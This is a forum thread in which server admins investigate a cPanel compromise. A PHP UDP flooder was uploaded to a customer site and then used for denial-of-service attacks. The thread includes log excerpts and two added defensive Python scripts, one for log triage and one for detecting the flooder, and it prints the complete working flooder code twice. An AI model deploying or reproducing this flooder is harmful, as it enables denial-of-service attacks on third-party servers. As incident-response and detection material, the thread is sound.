  1. #1
    Member (Join Date: Nov 2007, Location: wairarapa, Posts: 5)

    Spewing UDP traffic

    Anyone come across this problem?

    I have a WHM server that in the last three days has been spewing UDP packets to port 21 on receiving locations. Not all the time, but a real pain in the rear.
    I have had to put in an iptables rule to stop the server sending traffic on port 21, protocol UDP.

    Using Wireshark I saw no action that started the traffic, just that thousands of UDP packets left my server for port 21 on the receiving server, and the receiving server of course never responded to any of the packets.

    It would appear that I am being used for a DoS attack against these servers; anyone come across anything similar?

    I have stopped the process, but now want to find the smoking gun.
    Thanks in advance

  2. #2
    Member (Join Date: Aug 2009, Location: Houston, Tx, Posts: 275)

    Spewing UDP Traffic

    Hello,


    I am sorry to hear you are having issues, however with this being possibly malicious I would recommend that you contact your data center to see if they can help you track down the source of this issue. Please let me know if you have any other questions.

    Thank you,
    Matthew Curry

  3. #3
    Member (Join Date: Nov 2007, Location: wairarapa, Posts: 5)

    Spewing UDP Packets

    We are a small organisation and I am the "data center". I am backtracking and have run rootkit detectors to try and find how they got in and where, but have found nothing so far.

    So I am working from the simple reality that my server was spewing out thousands of identical UDP packets at other servers in the world. Being UDP, my server is not expecting any reply from the IP getting spewed at. Nor is one seen. Therefore I am trying to see what is triggering and controlling the flood.

    Nothing found so far. And my server was recently patched before this happened.

  4. #4
    Member (Join Date: Nov 2007, Location: wairarapa, Posts: 5)

    More info on spewing UDP

    This server of mine got hacked; how, I am not too sure. Possibly an injection with cPanel?

    At the same time as this happened:
    Code:
    Sep 12 20:15:49 web Cp-Wrap[2531]: Pushing "649 GETDOMAINIP xxxxxxx.xx.xx " to '/usr/local/cpanel/bin/apacheadmin' for UID: 649
    Sep 12 20:15:49 web Cp-Wrap[2531]: CP-Wrapper terminated without error
    Sep 12 20:15:49 web Cp-Wrap[2534]: Pushing "649 LISTSUBDOMAINS 0 " to '/usr/local/cpanel/bin/apacheadmin' for UID: 649
    Sep 12 20:15:49 web Cp-Wrap[2534]: CP-Wrapper terminated without error
    Sep 12 20:15:49 web Cp-Wrap[2536]: Pushing "649 LISTMULTIPARKED 0 " to '/usr/local/cpanel/bin/apacheadmin' for UID: 649
    Sep 12 20:15:49 web Cp-Wrap[2536]: CP-Wrapper terminated without error
    Sep 12 20:15:49 web Cp-Wrap[2538]: Pushing "649 COUNTDBS" to '/usr/local/cpanel/bin/mysqladmin' for UID: 649
    Sep 12 20:15:49 web Cp-Wrap[2538]: CP-Wrapper terminated without error
    Sep 12 20:15:49 web Cp-Wrap[2542]: Pushing "649 GETDISK" to '/usr/local/cpanel/bin/mysqladmin' for UID: 649
    Sep 12 20:15:50 web Cp-Wrap[2542]: CP-Wrapper terminated without error
    Sep 12 20:15:50 web Cp-Wrap[2549]: Pushing "649 LISTSTORE 0 0 " to '/usr/local/cpanel/bin/ftpadmin' for UID: 649
    Sep 12 20:15:50 web Cp-Wrap[2549]: CP-Wrapper terminated without error
    This file appeared on the customer's xxxxxxx.xx.xx website:
    -rw-r--r-- 1 eastern eastern 418 Sep 12 20:16 oyes.php

    containing
    Code:
    <?php
    // Bail out silently unless the caller supplies both a target and a port
    if(!$_GET['target'])
    {
    die('');
    }

    $target = $_GET['target'];

    if(!$_GET['port'])
    {
    die('');
    }

    $port = $_GET['port'];

    // One UDP socket; no handshake, so nothing is ever expected back
    $sock=socket_create(AF_INET,SOCK_DGRAM,SOL_UDP);

    if(!$sock) die("Cant Create Socket!!!");

    // A single 1400-byte random payload, reused for every datagram
    // (hence the thousands of identical packets seen on the wire)
    $data='';
    for($i=0;$i<1400;$i++)
    {
    $data.=chr(rand(0,255));
    }

    // Endless send loop: runs until the PHP process is stopped
    while(true)
    {
    if(!socket_sendto($sock,$data,strlen($data),0,$target,$port)) die("Error SendTo!!!");
    }

    ?>
    This was injected from 66.90.103.27; I have already contacted them to see what they may have to say.

    After the injection of this php file a different IP address then started sending requests to this PHP file such as this:
    Code:
    208.38.181.149 - - [16/Sep/2009:04:46:29 +1200] "GET /oyes.php?target=70.84.89.186&port=21 HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9.1"
    I am basically writing this to make people aware. I have cleaned up the problem and stopped the possibility of UDP packets being spewed from this server, but my bigger concern is I do not know definitively how they got in.

    I don't think it was a password hack, but neither does a crafted cpanel attack seem likely as it was so surgical.
    Anyone got any ideas?

  5. #5
    d_t, Member (Join Date: Sep 2003, Location: Bucharest, Posts: 239)

    Same problem, same script (oyes.php), same IP:

    Code:
    grep 66.90.103.27 /usr/local/cpanel/logs/access_log | grep POST
    66.90.103.27 proxy X [09/12/2009:06:21:04 -0000] "POST /frontend/x2/files/doupload.html HTTP/1.1" 200 0 "http://cpanel.XXX.XX/frontend/x2/files/upload.html?dir=%2fhome%2fXXX%2fpublic_html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.43 Safari/530.5"
    The attack was on UDP port 21. I'm not sure yet if the password was stolen or there is a problem with cPanel authentication using proxy. If I find out, I'll let you know. [the client user/domain was replaced with X]

  6. #6
    Member (Join Date: Nov 2007, Location: wairarapa, Posts: 5)

    cPanel insertion

    Thanks DT

    I had a look
    Code:
    grep 66.90.103.27 /usr/local/cpanel/logs/access_log | grep POST
    and found this
    Code:
    66.90.103.27 - xxxxxx[09/12/2009:07:47:53 -0000] "POST /frontend/x/files/doupload.html HTTP/1.1" 200 0 "http://xx.xx.xx.xx:2082/frontend/x/files/upload.html?dir=%2fhome%2fxxxxxx%2fpublic_html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.43 Safari/530.5"
    66.90.103.27 - xxxxxx [09/12/2009:08:16:10 -0000] "POST /frontend/x/files/doupload.html HTTP/1.1" 200 0 "http://xx.xx.xx.xx:2082/frontend/x/files/upload.html?dir=%2fhome%2fxxxxxx%2fpublic_html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.43 Safari/530.5"
    So injection or password hacked?
    The .lastlogin file did have their IP address in it. Could this only happen if they did log on?

  7. #7
    Registered User (Join Date: Sep 2007, Posts: 4)

    Hi there,

    We just found one of these too; the filename is q.php.

    Contents are the same.

    We, like you, are trying to see how it was injected. I assume /frontend/x2/files/doupload.html is secure; I only ask as there is very little comment from cPanel.

    Chris

  8. #8
    Member (Join Date: Aug 2002, Posts: 170)

    Check your Apache access logs for the first hit from that IP.
    If nothing is found, check that user's access log for anything suspicious.

    Did your user write his cPanel password in a PHP config.php file for MySQL?
    A lot of users do this instead of creating a separate MySQL user.
    It means any PHP vulnerability gives away the user's cPanel password.

    Allowing PHP sockets is a bad idea; consider removing it if you do not need it.
    It's not a default PHP module, and you don't need the PHP sockets module to use fsockopen or cURL, which most scripts that make remote connections use.
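The log check suggested in #8, as a small triage script. This is an added example, not code from the thread or from cPanel. The log lines inside it are constructed to resemble the excerpts posted above (the 66.90.103.27, 208.38.181.149 and 70.84.89.186 addresses are copied from the thread; 198.51.100.7, 203.0.113.10 and "victimuser" are placeholders), and the regex assumes the combined-log layout both the cPanel access_log and the Apache access log use here. It pulls out POSTs to the file-manager upload handler, any request to any script that carries target= and port= (so q.php is caught as well as oyes.php), and the first hit per client IP, which is where to start reading back from:

```python
"""Log triage for the oyes.php pattern (added example; sample lines are constructed)."""
import re
from urllib.parse import parse_qs, urlsplit

# Combined-log layout used by both logs quoted in the thread:
# client IP, ident, user, [timestamp], "METHOD path proto", status, size.
# The user field is matched lazily because one posted line has no space
# before the '[' of the timestamp ("xxxxxx[09/12/2009...").
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+?)\s*\[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# cPanel file-manager upload handler seen in posts #5 and #6 (theme x or x2).
UPLOAD_HANDLER = "/files/doupload.html"

# Constructed sample of /usr/local/cpanel/logs/access_log (MM/DD/YYYY timestamps,
# as in the thread). One line deliberately omits the space before '['.
CPANEL_ACCESS_LOG = """\
198.51.100.7 - victimuser [09/10/2009:10:01:00 -0000] "GET /frontend/x/index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
66.90.103.27 - victimuser[09/12/2009:07:47:53 -0000] "POST /frontend/x/files/doupload.html HTTP/1.1" 200 0 "http://203.0.113.10:2082/frontend/x/files/upload.html?dir=%2fhome%2fvictimuser%2fpublic_html" "Mozilla/5.0"
66.90.103.27 - victimuser [09/12/2009:08:16:10 -0000] "POST /frontend/x/files/doupload.html HTTP/1.1" 200 0 "http://203.0.113.10:2082/frontend/x/files/upload.html?dir=%2fhome%2fvictimuser%2fpublic_html" "Mozilla/5.0"
"""

# Constructed sample of the customer's Apache access log.
APACHE_ACCESS_LOG = """\
198.51.100.7 - - [15/Sep/2009:09:00:00 +1200] "GET /index.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
208.38.181.149 - - [16/Sep/2009:04:46:29 +1200] "GET /oyes.php?target=70.84.89.186&port=21 HTTP/1.1" 200 241 "-" "Mozilla/5.0"
208.38.181.149 - - [16/Sep/2009:04:46:31 +1200] "GET /images/q.php?target=70.84.89.186&port=53 HTTP/1.1" 200 241 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """One log line -> dict of fields, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def parse_log(text):
    """All parseable records from a log, in file order."""
    return [rec for rec in (parse_line(l) for l in text.splitlines()) if rec]


def find_uploads(cpanel_log):
    """POSTs to the file-manager upload handler: candidate moments the shell landed."""
    return [r for r in parse_log(cpanel_log)
            if r["method"] == "POST" and UPLOAD_HANDLER in r["path"]]


def find_flood_requests(apache_log):
    """Requests carrying the flooder's control parameters (target= and port=),
    whatever the script is called."""
    hits = []
    for r in parse_log(apache_log):
        parts = urlsplit(r["path"])
        qs = parse_qs(parts.query)
        if "target" in qs and "port" in qs:
            hits.append({"ip": r["ip"], "ts": r["ts"], "script": parts.path,
                         "target": qs["target"][0], "port": qs["port"][0]})
    return hits


def first_hit_per_ip(log):
    """Timestamp of the first line from each client IP, in file order."""
    first = {}
    for r in parse_log(log):
        first.setdefault(r["ip"], r["ts"])
    return first


if __name__ == "__main__":
    for u in find_uploads(CPANEL_ACCESS_LOG):
        print(f"upload  {u['ts']}  {u['ip']}  user={u['user']}  {u['path']}")
    for f in find_flood_requests(APACHE_ACCESS_LOG):
        print(f"flood   {f['ts']}  {f['ip']}  {f['script']} -> {f['target']}:{f['port']}")
    for ip, ts in first_hit_per_ip(APACHE_ACCESS_LOG).items():
        print(f"first   {ip}  {ts}")
```

On a real box, replace the two string constants with the contents of /usr/local/cpanel/logs/access_log and the customer's Apache log; the upload timestamp and the .lastlogin entry together tell you whether the attacker authenticated normally before the upload.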

  9. #9
    Member jenlepp's Avatar
    Join Date
    Jul 2005
    Location
    Liberty Hill, TX
    Posts
    115
    cPanel/Enkompass Access Level

    DataCenter Provider

    Default

    Did anyone ever find how these got in? Just found one on a user site and diving now, but I was curious if anyone narrowed it down.
    Jen Lepp
    Director of Customer Service
    A Small Orange Homegrown Hosting | http://www.asmallorange.com
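For anyone, like #9, hunting for more copies of this script: the filename varies (oyes.php in #4, q.php in #7) but the body does not, so a content-based scan finds what a name-based one misses. This is an added example, not code from the thread or from cPanel. It builds a throwaway directory tree of constructed files (two renamed copies of the flooder body posted in #4, a benign one-shot UDP sender, a trivial index.php) and flags PHP files that show at least three of the flooder's traits. The indicator regexes and the min_hits threshold are my choices, not anything from cPanel:

```python
"""Content-based hunt for copies of the UDP flooder (added example; files are constructed)."""
import os
import re
import tempfile

# Traits of the script posted in #4. Each is weak on its own (a syslog client
# also opens a UDP socket); the combination is what marks a flooder.
INDICATORS = {
    "udp_socket": re.compile(r"socket_create\s*\(\s*AF_INET\s*,\s*SOCK_DGRAM"),
    "sendto": re.compile(r"socket_sendto\s*\("),
    "infinite_loop": re.compile(r"while\s*\(\s*(true|1)\s*\)"),
    "remote_target": re.compile(r"\$_(GET|POST|REQUEST)\s*\[\s*['\"](target|host|ip)['\"]"),
    "random_payload": re.compile(r"chr\s*\(\s*rand\s*\("),
}
PHP_SUFFIXES = (".php", ".php5", ".phtml", ".inc")


def classify(src):
    """Names of the indicators present in one file's source, sorted."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(src))


def scan_tree(root, min_hits=3):
    """Walk a docroot; return (relative path, indicators) for PHP-like files
    that match at least min_hits traits, sorted by path."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            if not fn.lower().endswith(PHP_SUFFIXES):
                continue
            full = os.path.join(dirpath, fn)
            try:
                with open(full, "r", encoding="utf-8", errors="replace") as fh:
                    hits = classify(fh.read())
            except OSError:
                continue
            if len(hits) >= min_hits:
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                findings.append((rel, hits))
    return sorted(findings)


# Constructed sample files. FLOODER_SRC is the body from #4 with whitespace
# normalised; BENIGN_SRC is a legitimate one-shot UDP sender (a syslog client).
FLOODER_SRC = """<?php
if(!$_GET['target']) { die(''); }
$target = $_GET['target'];
if(!$_GET['port']) { die(''); }
$port = $_GET['port'];
$sock=socket_create(AF_INET,SOCK_DGRAM,SOL_UDP);
if(!$sock) die("Cant Create Socket!!!");
$data='';
for($i=0;$i<1400;$i++) { $data.=chr(rand(0,255)); }
while(true) {
  if(!socket_sendto($sock,$data,strlen($data),0,$target,$port)) die("Error SendTo!!!");
}
?>"""
BENIGN_SRC = """<?php
$sock = socket_create(AF_INET, SOCK_DGRAM, SOL_UDP);
$msg = "<13>app: started";
socket_sendto($sock, $msg, strlen($msg), 0, "127.0.0.1", 514);
?>"""


def build_sample_tree():
    """Throwaway public_html with two renamed copies of the flooder and two clean files."""
    root = tempfile.mkdtemp(prefix="public_html_")
    os.makedirs(os.path.join(root, "images"))
    for rel, src in {
        "oyes.php": FLOODER_SRC,
        os.path.join("images", "q.php"): FLOODER_SRC,
        "syslog.php": BENIGN_SRC,
        "index.php": "<?php echo 'hello'; ?>",
    }.items():
        with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
            fh.write(src)
    return root


if __name__ == "__main__":
    sample_root = build_sample_tree()
    for path, hits in scan_tree(sample_root):
        print(f"{path}: {', '.join(hits)}")
```

Point scan_tree at /home/*/public_html to run it for real; the benign syslog.php scores two traits and stays below the threshold, while both copies of the flooder score all five regardless of what they were renamed to.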
